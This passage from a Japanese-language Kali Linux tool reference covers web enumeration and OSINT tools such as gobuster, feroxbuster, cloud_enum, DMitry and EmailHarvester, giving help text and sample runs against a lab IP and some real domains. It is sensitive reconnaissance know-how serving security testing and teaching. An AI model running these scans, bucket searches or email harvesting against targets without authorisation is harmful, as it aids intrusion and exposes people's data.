and interchangeable. The same goes for urls, headers, status codes, queries, and size filters.
■ 使用例
root@kali:~# feroxbuster --url http://192.168.11.4 --depth 2 --wordlist words.txt -x php -x html
[...]
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.11.4
🚀 Threads │ 50
📖 Wordlist │ words.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, html]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 269l 2570w 53733c http://192.168.11.4/
301 GET 0l 0w 0c http://192.168.11.4/index.php => http://192.168.11.4/
200 GET 384l 3177w 19915c http://192.168.11.4/license.txt
200 GET 13l 78w 4373c http://192.168.11.4/wp-admin/images/wordpress-logo.png
200 GET 379l 743w 5967c http://192.168.11.4/wp-admin/css/install.css
302 GET 0l 0w 0c http://192.168.11.4/wp-admin/update-core.php => http://192.168.11.4/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.4%2Fwp-admin%2Fupdate-core.php&reauth=1
302 GET 0l 0w 0c http://192.168.11.4/wp-admin/import.php => http://192.168.11.4/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.4%2Fwp-admin%2Fimport.php&reauth=1
200 GET 23l 68w 1191c http://192.168.11.4/wp-admin/upgrade.php
302 GET 0l 0w 0c http://192.168.11.4/wp-admin/ => http://192.168.11.4/wp-login.php?redirect_to=http%3A%2F%2F192.168.11.4%2Fwp-admin%2F&reauth=1
200 GET 116l 408w 7852c http://192.168.11.4/wp-login.php
200 GET 17l 63w 1284c http://192.168.11.4/wp-admin/install.php
200 GET 97l 830w 7437c http://86wordpress/readme.html
[...]
[####################] - 5s 42738/42738 0s found:74 errors:0
[####################] - 2s 14205/14205 7307/s http://192.168.11.4/
[####################] - 3s 14205/14205 4704/s http://192.168.11.4/wp-content/
[####################] - 3s 14205/14205 4704/s http://192.168.11.4/wp-includes/
Gobuster
単語リストを使用してURLやサブドメイン、バーチャルホスト、S3バケット名などの探索を行います。
■ 使用方法
root@kali:~# gobuster help
Usage:
gobuster [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
dir Uses directory/file enumeration mode
dns Uses DNS subdomain enumeration mode
fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body
gcs Uses gcs bucket enumeration mode
help Help about any command
s3 Uses aws bucket enumeration mode
tftp Uses TFTP enumeration mode
version shows the current version
vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)
Flags:
--debug Enable debug output
--delay duration Time each thread waits between requests (e.g. 1500ms)
-h, --help help for gobuster
--no-color Disable color output
--no-error Don\'t display errors
-z, --no-progress Don\'t display progress
-o, --output string Output file to write results to (defaults to stdout)
-p, --pattern string File containing replacement patterns
-q, --quiet Don\'t print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist. Set to - to use STDIN.
--wordlist-offset int Resume from a given position in the wordlist (defaults to 0)
■ 使用例
root@kali:~# gobuster dir --url http://192.168.11.4/includes/ -x inc --wordlist words.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.11.4/includes/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: inc
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/common.inc (Status: 200) [Size: 290727]
/image.inc (Status: 200) [Size: 12137]
/mail.inc (Status: 200) [Size: 21628]
/password.inc (Status: 200) [Size: 9362]
/ajax.inc (Status: 200) [Size: 45330]
/menu.inc (Status: 200) [Size: 132504]
/install.inc (Status: 200) [Size: 40782]
/form.inc (Status: 200) [Size: 182668]
/file.inc (Status: 200) [Size: 84154]
/date.inc (Status: 200) [Size: 4505]
/update.inc (Status: 200) [Size: 58047]
/language.inc (Status: 200) [Size: 13605]
/cache.inc (Status: 200) [Size: 17508]
/theme.inc (Status: 200) [Size: 97675]
/module.inc (Status: 200) [Size: 36163]
[...]
===============================================================
Finished
===============================================================
root@kali:~# gobuster fuzz --url http://192.168.11.4/?q=FUZZ --wordlist words.txt --excludestatuscodes 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.11.4/?q=FUZZ
[+] Method: GET
[+] Threads: 10
[+] Wordlist: words.txt
[+] Excluded Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in fuzzing mode
===============================================================
Found: [Status=403] [Length=7713] [Word=search] http://192.168.11.4/?q=search
Found: [Status=200] [Length=7648] [Word=user] http://192.168.11.4/?q=user
Found: [Status=200] [Length=9860] [Word=0] http://192.168.11.4/?q=0
Found: [Status=403] [Length=7877] [Word=admin] http://192.168.11.4/?q=admin
Found: [Status=200] [Length=9860] [Word=node] http://192.168.11.4/?q=node
Found: [Status=403] [Length=7713] [Word=Search] http://192.168.11.4/?q=Search
Found: [Status=200] [Length=9293] [Word=User] http://192.168.11.4/?q=User
Found: [Status=403] [Length=7710] [Word=Admin] http://192.168.11.4/?q=Admin
[...]
GoSpider
指定されたサイトをクローリングしてURLを収集します。
■ 使用方法
root@kali:~# gospider --help
Usage:
gospider [flags]
Flags:
-s, --site string Site to crawl
-S, --sites string Site list to crawl
-p, --proxy string Proxy (Ex: http://127.0.0.1:8080)
-o, --output string Output folder
-u, --user-agent string User Agent to use
web: random web user-agent
mobi: random mobile user-agent
or you can set your special user-agent (default "web")
--cookie string Cookie to use (testA=a; testB=b)
-H, --header stringArray Header to use (Use multiple flag to set multiple header)
--burp string Load headers and cookie from burp raw http request
--blacklist string Blacklist URL Regex
-t, --threads int Number of threads (Run sites in parallel) (default 1)
-c, --concurrent int The number of the maximum allowed concurrent requests of the matching domains (default 5)
-d, --depth int MaxDepth limits the recursion depth of visited URLs. (Set it to 0 for infinite recursion) (default 1)
-k, --delay int Delay is the duration to wait before creating a new request to the matching domains (second)
-K, --random-delay int RandomDelay is the extra randomized duration to wait added to Delay before creating a new request (second)
-m, --timeout int Request timeout (second) (default 10)
--sitemap Try to crawl sitemap.xml
--robots Try to crawl robots.txt (default true)
-a, --other-source Find URLs from 3rd party (Archive.org, CommonCrawl.org, VirusTotal.com)
-w, --include-subs Include subdomains crawled from 3rd party. Default is main domain
-r, --include-other-source Also include other-source\'s urls (still crawl and request)
--debug Turn on debug mode
-v, --verbose Turn on verbose
--no-redirect Disable redirect
--version Check version
-h, --help help for gospider
■ 使用例
root@kali:~# gospider -v -d 5 -s http://192.168.11.4/
INFO Crawling site: http://192.168.11.4/
[subdomains] - 192.168.11.4
[url] - [code-200] - http://192.168.11.4/
[javascript] - http://192.168.11.4/wp-includes/blocks/navigation/view.min.js?ver=3776ea67846b3bb10fe8f7cdd486b0ba
[url] - [code-200] - http://192.168.11.4/wp-includes/wlwmanifest.xml
[url] - [code-200] - http://192.168.11.4/?feed=comments-rss2
[url] - [code-200] - http://192.168.11.4/xmlrpc.php?rsd
[url] - [code-200] - http://192.168.11.4/?feed=rss2
[url] - [code-200] - http://192.168.11.4/?page_id=2
[url] - [code-200] - http://192.168.11.4/?page_id=733
[url] - [code-200] - http://192.168.11.4/?page_id=1977
[url] - [code-200] - http://192.168.11.4/?page_id=701
[url] - [code-200] - http://192.168.11.4/?page_id=703
[...]
Hakrawler
指定されたURLをクローリングしてURLを収集します。
■ 使用方法
root@kali:~# hakrawler --help
Usage of hakrawler:
-d int
Depth to crawl. (default 2)
-h string
Custom headers separated by two semi-colons. E.g. -h "Cookie: foo=bar;;Referer: http://example.com/"
-insecure
Disable TLS verification.
-json
Output as JSON.
-proxy string
Proxy URL. E.g. -proxy http://127.0.0.1:8080
-s Show the source of URL based on where it was found. E.g. href, form, script, etc.
-size int
Page size limit, in KB. (default -1)
-subs
Include subdomains for crawling.
-t int
Number of threads to utilise. (default 8)
-timeout int
Maximum time to crawl each URL from stdin, in seconds. (default -1)
-u Show only unique urls.
■ 使用例
root@kali:~# echo http://192.168.11.4 | hakrawler
http://192.168.11.4/
http://192.168.11.4/?page_id=2
http://192.168.11.4/?page_id=703
http://192.168.11.4/?page_id=701
http://192.168.11.4/?page_id=182
http://192.168.11.4/?page_id=1134
http://192.168.11.4/?page_id=1133
http://192.168.11.4/?page_id=501
http://192.168.11.4/?page_id=155
http://192.168.11.4/?page_id=156
http://192.168.11.4/?page_id=174
[...]
HTTrack
指定されたサイトをローカルにコピーします。
■ 使用方法
root@kali:~# httrack --help
usage: httrack <URLs> [-option] [+<URL_FILTER>] [-<URL_FILTER>] [+<mime:MIME_FILTER>] [-<mime:MIME_FILTER>]
with options listed below: (* is the default value)
General options:
O path for mirror/logfiles+cache (-O path_mirror[,path_cache_and_logfiles]) (--path <param>)
Action options:
w *mirror web sites (--mirror)
W mirror web sites, semi-automatic (asks questions) (--mirror-wizard)
g just get files (saved in the current directory) (--get-files)
i continue an interrupted mirror using the cache (--continue)
Y mirror ALL links located in the first level pages (mirror links) (--mirrorlinks)
Proxy options:
P proxy use (-P proxy:port or -P user:pass@proxy:port) (--proxy <param>)
%f *use proxy for ftp (f0 don\'t use) (--httpproxy-ftp[=N])
%b use this local hostname to make/send requests (-%b hostname) (--bind <param>)
Limits options:
rN set the mirror depth to N (* r9999) (--depth[=N])
%eN set the external links depth to N (* %e0) (--ext-depth[=N])
mN maximum file length for a non-html file (--max-files[=N])
mN,N2 maximum file length for non html (N) and html (N2)
MN maximum overall size that can be uploaded/scanned (--max-size[=N])
EN maximum mirror time in seconds (60=1 minute, 3600=1 hour) (--max-time[=N])
AN maximum transfer rate in bytes/seconds (1000=1KB/s max) (--max-rate[=N])
%cN maximum number of connections/seconds (*%c10) (--connection-per-second[=N])
GN pause transfer if N bytes reached, and wait until lock file is deleted (--max-pause[=N])
Flow control:
cN number of multiple connections (*c8) (--sockets[=N])
TN timeout, number of seconds after a non-responding link is shutdown (--timeout[=N])
RN number of retries, in case of timeout or non-fatal errors (*R1) (--retries[=N])
JN traffic jam control, minimum transfert rate (bytes/seconds) tolerated for a link (--min-rate[=N])
HN host is abandoned if: 0=never, 1=timeout, 2=slow, 3=timeout or slow (--host-control[=N])
Links options:
%P *extended parsing, attempt to parse all links, even in unknown tags or Javascript (%P0 don\'t use) (--extended-parsing[=N])
n get non-html files 'near' an html file (ex: an image located outside) (--near)
t test all URLs (even forbidden ones) (--test)
%L <file> add all URL located in this text file (one URL per line) (--list <param>)
%S <file> add all scan rules located in this text file (one scan rule per line) (--urllist <param>)
Build options:
NN structure type (0 *original structure, 1+: see below) (--structure[=N])
or user defined structure (-N "%h%p/%n%q.%t")
%N delayed type check, don\'t make any link test but wait for files download to start instead (experimental) (%N0 don\'t use, %N1 use for unknown extensions, * %N2 always use)
%D cached delayed type check, don\'t wait for remote type during updates, to speedup them (%D0 wait, * %D1 don\'t wait) (--cached-delayed-type-check)
%M generate a RFC MIME-encapsulated full-archive (.mht) (--mime-html)
LN long names (L1 *long names / L0 8-3 conversion / L2 ISO9660 compatible) (--long-names[=N])
KN keep original links (e.g. http://www.adr/link) (K0 *relative link, K absolute links, K4 original links, K3 absolute URI links, K5 transparent proxy link) (--keep-links[=N])
x replace external html links by error pages (--replace-external)
%x do not include any password for external password protected websites (%x0 include) (--disable-passwords)
%q *include query string for local files (useless, for information purpose only) (%q0 don\'t include) (--include-query-string)
o *generate output html file in case of error (404..) (o0 don\'t generate) (--generate-errors)
X *purge old files after update (X0 keep delete) (--purge-old[=N])
%p preserve html files 'as is' (identical to '-K4 -%F ""') (--preserve)
%T links conversion to UTF-8 (--utf8-conversion)
Spider options:
bN accept cookies in cookies.txt (0=do not accept,* 1=accept) (--cookies[=N])
u check document type if unknown (cgi,asp..) (u0 don\'t check, * u1 check but /, u2 check always) (--check-type[=N])
j *parse Java Classes (j0 don\'t parse, bitmask: |1 parse default, |2 don\'t parse .class |4 don\'t parse .js |8 don\'t be aggressive) (--parse-java[=N])
sN follow robots.txt and meta robots tags (0=never,1=sometimes,* 2=always, 3=always (even strict rules)) (--robots[=N])
%h force HTTP/1.0 requests (reduce update features, only for old servers or proxies) (--http-10)
%k use keep-alive if possible, greately reducing latency for small files and test requests (%k0 don\'t use) (--keep-alive)
%B tolerant requests (accept bogus responses on some servers, but not standard!) (--tolerant)
%s update hacks: various hacks to limit re-transfers when updating (identical size, bogus response..) (--updatehack)
%u url hacks: various hacks to limit duplicate URLs (strip //, www.foo.com==foo.com..) (--urlhack)
%A assume that a type (cgi,asp..) is always linked with a mime type (-%A php3,cgi=text/html;dat,bin=application/x-zip) (--assume <param>)
shortcut: '--assume standard' is equivalent to -%A php2 php3 php4 php cgi asp jsp pl cfm nsf=text/html
can also be used to force a specific file type: --assume foo.cgi=text/html
@iN internet protocol (0=both ipv6+ipv4, 4=ipv4 only, 6=ipv6 only) (--protocol[=N])
%w disable a specific external mime module (-%w htsswf -%w htsjava) (--disable-module <param>)
Browser ID:
F user-agent field sent in HTTP headers (-F "user-agent name") (--user-agent <param>)
%R default referer field sent in HTTP headers (--referer <param>)
%E from email address sent in HTTP headers (--from <param>)
%F footer string in Html code (-%F "Mirrored [from host %s [file %s [at %s]]]" (--footer <param>)
%l preffered language (-%l "fr, en, jp, *" (--language <param>)
%a accepted formats (-%a "text/html,image/png;q=0.9,*/*;q=0.1" (--accept <param>)
%X additional HTTP header line (-%X "X-Magic: 42" (--headers <param>)
Log, index, cache
C create/use a cache for updates and retries (C0 no cache,C1 cache is prioritary,* C2 test update before) (--cache[=N])
k store all files in cache (not useful if files on disk) (--store-all-in-cache)
%n do not re-download locally erased files (--do-not-recatch)
%v display on screen filenames downloaded (in realtime) - * %v1 short version - %v2 full animation (--display)
Q no log - quiet mode (--do-not-log)
q no questions - quiet mode (--quiet)
z log - extra infos (--extra-log)
Z log - debug (--debug-log)
v log on screen (--verbose)
f *log in files (--file-log)
f2 one single log file (--single-log)
I *make an index (I0 don\'t make) (--index)
%i make a top index for a project folder (* %i0 don\'t make) (--build-top-index)
%I make an searchable index for this mirror (* %I0 don\'t make) (--search-index)
■ 使用例
root@kali:~# httrack https://192.168.11.4
Mirror launched on Tue, 15 Oct 2024 13:18:53 by HTTrack Website Copier/3.49-5 [XR&CO\'2014]
mirroring https://192.168.11.4 with the wizard help..
[...]
Thanks for using HTTrack!
Photon
WebサイトをクローリングしてページURLやメールアドレス、静的ファイルのURLなどを収集します。
■ 使用方法
root@kali:~# photon --help
usage: photon.py [-h] [-u ROOT] [-c COOK] [-r REGEX] [-e {csv,json}] [-o OUTPUT] [-l LEVEL] [-t THREADS] [-d DELAY] [-v]
[-s SEEDS [SEEDS ...]] [--stdout STD] [--user-agent USER_AGENT] [--exclude EXCLUDE] [--timeout TIMEOUT] [--clone] [--headers]
[--dns] [--keys] [--only-urls] [--wayback]
options:
-h, --help show this help message and exit
-u ROOT, --url ROOT root url
-c COOK, --cookie COOK
cookie
-r REGEX, --regex REGEX
regex pattern
-e {csv,json}, --export {csv,json}
export format
-o OUTPUT, --output OUTPUT
output directory
-l LEVEL, --level LEVEL
levels to crawl
-t THREADS, --threads THREADS
number of threads
-d DELAY, --delay DELAY
delay between requests
-v, --verbose verbose output
-s SEEDS [SEEDS ...], --seeds SEEDS [SEEDS ...]
additional seed URLs
--stdout STD send variables to stdout
--user-agent USER_AGENT
custom user agent(s)
--exclude EXCLUDE exclude URLs matching this regex
--timeout TIMEOUT http request timeout
--clone clone the website locally
--headers add headers
--dns enumerate subdomains and DNS data
--keys find secret keys
--only-urls only extract URLs
--wayback fetch URLs from archive.org as seeds
■ 使用例
root@kali:~# photon -u http://192.168.11.4 -l 3
[~] Level 1: 1 URLs
[!] Progress: 1/1
[~] Level 2: 5 URLs
[!] Progress: 5/5
[~] Level 3: 63 URLs
[!] Progress: 63/63
[~] Crawling 5 JavaScript files
[!] Progress: 5/5
--------------------------------------------------
[+] Files: 1
[+] Intel: 14
[+] Internal: 321
[+] Scripts: 5
[+] External: 298
[+] Fuzzable: 249
--------------------------------------------------
[!] Total requests made: 75
[!] Total time taken: 0 minutes 2 seconds
[!] Requests per second: 34
[+] Results saved in 192.168.11.4 directory
root@kali:~# ls 192.168.11.4
external.txt files.txt fuzzable.txt intel.txt internal.txt scripts.txt
root@kali:~# cat 192.168.11.4/intel.txt
http://192.168.11.4/mutillidae/index.php?page=credits.php:mutillidae-development@gmail.com
http://192.168.11.4/twiki/TWikiDocumentation.html:secondary@home.com
http://192.168.11.4/twiki/TWikiDocumentation.html:name@domain.com
http://192.168.11.4/mutillidae/./index.php?page=browser-info.php:abuse@iana.org
[...]
root@kali:~# cat 192.168.11.4/internal.txt
http://192.168.11.4/mutillidae/././index.php?do=toggle-hints&page=set-background-color.php
http://192.168.11.4/mutillidae/./index.php?do=toggle-security&page=source-viewer.php
http://192.168.11.4/mutillidae/index.php?page=documentation/?page=add-to-your-blog.php
http://192.168.11.4/mutillidae/./index.php?do=toggle-hints&page=show-log.php
[...]
OSINT(Open Source Intelligence)
Bing-ip2hosts
指定したIPアドレスやホスト名をBing.comで検索し、その結果をスクレイピングしてホスト名を一覧表示します。
■ 使用方法
root@kali:~# bing-ip2hosts --help
Usage: /usr/bin/bing-ip2hosts [OPTIONS] IP|hostname
OPTIONS are:
-o FILE Output hostnames to FILE.
-i FILE Input list of IP addresses or hostnames from FILE.
-n NUM Stop after NUM scraped pages return no new results (Default: 5).
-l Select the language for use in the setlang parameter (Default: en-us).
-m Select the market for use in the setmkt parameter (Default is unset).
-u Only display hostnames. Default is to include URL prefixes.
-c CSV output. Outputs the IP and hostname on each line, separated by a comma.
-q Quiet. Disable output except for final results.
-t DIR Use this directory instead of /tmp.
-V Display the version number of bing-ip2hosts and exit.
■ 使用例
root@kali:~# bing-ip2hosts microsoft.com
[...]
[▊] /search?q=ip%3A20.70.246.20+.&qs=n&first=70&FORM=PERE&setlang=en-us&setmkt=
http://www.research.microsoft.com
https://startups.microsoft.com
http://www.msdn.microsoft.com
https://startups.microsoft.com
http://www.research.microsoft.com
https://startups.microsoft.com
Stopping after scraping 5 pages without any new results.
https://microsoft.com/
https://startups.microsoft.com/
https://www.microsoft.com/
http://www.msdn.microsoft.com/
http://www.research.microsoft.com/
✓ Found 5 results after scraping 8 pages.
root@kali:~# bing-ip2hosts 203.180.216.158
[...]
https://www.city.adachi.tokyo.jp/
https://www.city.hiroshima.lg.jp/
https://www.city.kawasaki.jp/
https://www.city.kumamoto.jp/
https://www.city.machida.tokyo.jp/
https://www.city.sendai.jp/
https://www.gotokyo.org/
https://www.iodata.jp/
https://www.nishitetsu.jp/
https://www.pref.kanagawa.jp/
https://www.pref.kumamoto.jp/
https://www.pref.osaka.lg.jp/
✓ Found 12 results after scraping 10 pages.
CertGraph
SSL証明書のサブジェクトの代替名をクローリングしてホスト名を収集します。
■ 使用方法
root@kali:~# certgraph --help
Usage of certgraph: [OPTION]... HOST...
https://github.com/lanrat/certgraph
OPTIONS:
-cdn
include certificates from CDNs
-ct-expired
include expired certificates in certificate transparency search
-ct-subdomains
include sub-domains in certificate transparency search
-depth uint
maximum BFS depth to go (default 5)
-details
print details about the domains crawled
-dns
check for DNS records to determine if domain is registered
-driver string
driver to use [crtsh, google, http, smtp] (default "http")
-json
print the graph as json, can be used for graph in web UI
-parallel uint
number of certificates to retrieve in parallel (default 10)
-sanscap int
maximum number of uniq TLD+1 domains in certificate to include, 0 has no limit (default 80)
-save string
save certs to folder in PEM format
-timeout uint
tcp timeout in seconds (default 10)
-tldplus1
for every domain found, add tldPlus1 of the domain\'s parent
-updatepsl
Update the default Public Suffix List
-verbose
verbose logging
-version
print version and exit
■ 使用例
root@kali:~# certgraph yahoo.co.jp
yahoo.co.jp
info.hatalike.yahoo.co.jp
edge01.yahoo.co.jp
snsimg.carview.co.jp
digitalguide.jp
yimg.jp
yjtag.jp
shopping.yahooapis.jp
ms.yahoo.co.jp
mkimg.carview.co.jp
xml.listing.yahoo.co.jp
search.yahooapis.jp
frame.games.yahoo.co.jp
auctions.yahooapis.jp
store.yahoo.co.jp
[...]
cloud_enum
ターゲットとなる企業などのクラウドサービス上の公開リソース(オブジェクトストレージなど)を探索します。
[対応クラウド]
- Amazon
- Microsoft
■ 使用方法
root@kali:~# cloud_enum --help
usage: cloud_enum [-h] (-k KEYWORD | -kf KEYFILE) [-m MUTATIONS] [-b BRUTE] [-t THREADS] [-ns NAMESERVER] [-l LOGFILE] [-f FORMAT]
[--disable-aws] [--disable-azure] [--disable-gcp] [-qs]
options:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: /usr/lib/cloud-enum/enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: /usr/lib/cloud-enum/enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Appends found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv) - default: text
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
■ 使用例
root@kali:~# cloud_enum -k ***** --disable-azure --disable-gcp
Keywords: *****
Mutations: /usr/lib/cloud-enum/enum_tools/fuzz.txt
Brute-list: /usr/lib/cloud-enum/enum_tools/fuzz.txt
[+] Mutations list imported: 242 items
[+] Mutated results: 1453 items
++++++++++++++++++++++++++
amazon checks
++++++++++++++++++++++++++
[+] Checking for S3 buckets
Protected S3 Bucket: http://*****.s3.amazonaws.com/
OPEN S3 BUCKET: http://*****-api.s3.amazonaws.com/
FILES:
->http://*****-api.s3.amazonaws.com/*****-api
->http://*****-api.s3.amazonaws.com/404.html
->http://*****-api.s3.amazonaws.com/*****Search.html
->http://*****-api.s3.amazonaws.com/favicon.ico
->http://*****-api.s3.amazonaws.com/index.html
->http://*****-api.s3.amazonaws.com/index_test.html
Protected S3 Bucket: http://*****-app.s3.amazonaws.com/
Protected S3 Bucket: http://*****-cloud.s3.amazonaws.com/
Protected S3 Bucket: http://*****.com.s3.amazonaws.com/
Protected S3 Bucket: http://*****-db.s3.amazonaws.com/
[...]
[+] Checking for AWS Apps
[*] Brute-forcing a list of 1453 possible DNS names
[!] DNS Timeout on *****-2.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on bamboo.*****.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on club*****.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on club-*****.awsapps.com. Investigate if there are many of these.
[!] DNS Timeout on *****qa.awsapps.com. Investigate if there are many of these.
[...]
CloudBrute
ターゲットとなる企業などのクラウドサービス上の公開リソース(オブジェクトストレージなど)を探索します。
[対応クラウド]
- Amazon
- Microsoft
- DigitalOcean
- Alibaba
- Vultr
- Linode
■ 使用方法
root@kali:~# cloudbrute --help
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: /etc/cloudbrute/config
■ 使用例
# 指定したキーワード*****と単語リストを使って該当するクラウドストレージを走査
# 指定したドメインはクラウドプロバイダーの特定に使用(正引きでIPアドレスを取得しIPinfoのAPIでGEO情報を使って割り出す)
root@kali:~# cloudbrute -d *****.jp -k ***** -m storage -w /usr/share/cloudbrute/data/storage_small.txt
[...]
3:25AM INF Detect config path: /etc/cloudbrute/config/config.yaml
3:25AM INF Detect provider path: /etc/cloudbrute/config/modules
3:25AM INF Initialized scan config
3:25AM INF amazon detected
3:25AM INF Initialized amazon config
80 / 336 [================================>--------------------------------------------------------------------------------------------------------] 23.81% 00m04s
3:25AM WRN 403: Protected - *****-demo.s3.amazonaws.com
336 / 336 [============================================================================================================================================] 100.00% 4s
DMitry
WHOIS情報やサブドメインの検索、メールアドレスの収集、ポートスキャンの実行などをまとめて行います。
■ 使用方法
root@kali:~# dmitry --help
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
-o Save output to %host.txt or to file specified by -o file
-i Perform a whois lookup on the IP address of a host
-w Perform a whois lookup on the domain name of a host
-n Retrieve Netcraft.com information on a host
-s Perform a search for possible subdomains
-e Perform a search for possible email addresses
-p Perform a TCP port scan on a host
* -f Perform a TCP port scan on a host showing output reporting filtered ports
* -b Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed
■ 使用例
root@kali:~# dmitry -winsepo result.txt example.com
[...]
HostIP:93.184.215.14
HostName:example.com
Gathered Inet-whois information for 93.184.215.14
---------------------------------
inetnum: 93.184.212.0 - 93.184.215.255
netname: EDGECAST-NETBLK-03
descr: NETBLK-03-EU-93-184-212-0-22
country: EU
[...]
Gathered Inic-whois information for example.com
---------------------------------
Domain Name: EXAMPLE.COM
Registry Domain ID: 2336799_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.iana.org
Registrar URL: http://res-dom.iana.org
Updated Date: 2024-08-14T07:01:34Z
Creation Date: 1995-08-14T04:00:00Z
Registry Expiry Date: 2025-08-13T04:00:00Z
Registrar: RESERVED-Internet Assigned Numbers Authority
[...]
Gathered Subdomain information for example.com
---------------------------------
Searching Google.com:80...
HostName:www.example.com
HostIP:93.184.215.14
HostName:WWW.example.com
HostIP:93.184.215.14
Searching Altavista.com:80...
Found 2 possible subdomain(s) for host example.com, Searched 0 pages containing 0 results
[...]
Gathered E-Mail information for example.com
---------------------------------
Searching Google.com:80...
someone@example.com
info@example.com
example@example.com
name@example.com
someoneelse@example.com
[...]
Gathered TCP Port information for 93.184.215.14
---------------------------------
Port State
80/tcp open
Portscan Finished: Scanned 150 ports, 0 ports were in state closed
EmailHarvester
主要な検索エンジンを使用してメールアドレスを収集します。
■ 使用方法
root@kali:~# emailharvester --help
usage: EmailHarvester.py [-h] [-d DOMAIN] [-s FILE] [-e ENGINE] [-l LIMIT] [-u USER-AGENT] [-x PROXY] [--noprint] [-r EXCLUDED_PLUGINS] [-p]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Domain to search.
-s FILE, --save FILE Save the results into a TXT and XML file (both).
-e ENGINE, --engine ENGINE
Select search engine plugin(eg. '-e google').
-l LIMIT, --limit LIMIT
Limit the number of results.
-u USER-AGENT, --user-agent USER-AGENT
Set the User-Agent request header.
-x PROXY, --proxy PROXY
Setup proxy server (eg. '-x http://127.0.0.1:8080')
--noprint EmailHarvester will print discovered emails to terminal. It is possible to tell EmailHarvester not to print results to terminal with this option.
-r EXCLUDED_PLUGINS, --exclude EXCLUDED_PLUGINS
Plugins to exclude when you choose 'all' for search engine (eg. '-r google,twitter')
-p, --list-plugins List all available plugins.
■ 使用例
# LinkedIn上のGMailアドレスを検索エンジンを使用して取得
root@kali:~# emailharvester -d gmail.com -e linkedin
[+] User-Agent in use: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
[+] Searching in Linkedin
[+] Searching in Yahoo + Linkedin: 101 results
[+] Searching in Bing + Linkedin: 50 results
[+] Searching in Bing + Linkedin: 100 results
[+] Searching in Google + Linkedin: 100 results
[+] Searching in Baidu + Linkedin: 10 results
[+] Searching in Baidu + Linkedin: 20 results
[+] Searching in Baidu + Linkedin: 30 results
[+] Searching in Baidu + Linkedin: 40 results
[+] Searching in Baidu + Linkedin: 50 results
[+] Searching in Baidu + Linkedin: 60 results
[+] Searching in Baidu + Linkedin: 70 results
[+] Searching in Baidu + Linkedin: 80 results
[+] Searching in Baidu + Linkedin: 90 results
[+] Searching in Baidu + Linkedin: 100 results
[+] Searching in Exalead + Linkedin: 50 results
[+] Searching in Exalead + Linkedin: 100 results
[+] Emails found: 82
******@gmail.com
******@gmail.com
******@gmail.com
******@gmail.com
******@gmail.com
Exif Looter
画像のExif情報に含まれる位置情報を抽出します。
■ 使用方法
root@kali:~# exiflooter --help
Usage:
exifLooter [flags]
Flags:
-d, --directory string Specify a directory for Analyzing
-h, --help help for exifLooter
-i, --image string Specify a image for Analyzing
-m, --open-street-map Get Open Street Map Link
-p, --pipe Pipe with other scripts
-r, --remove Remove metadata from Image
■ 使用例
# 使用画像:https://github.com/ianare/exif-samples
root@kali:~# exiflooter -i DSCN0010.jpg -m
GPS Latitude Ref: North
GPS Longitude Ref: East
GPS Altitude Ref: Above Sea Level
GPS Time Stamp: 14
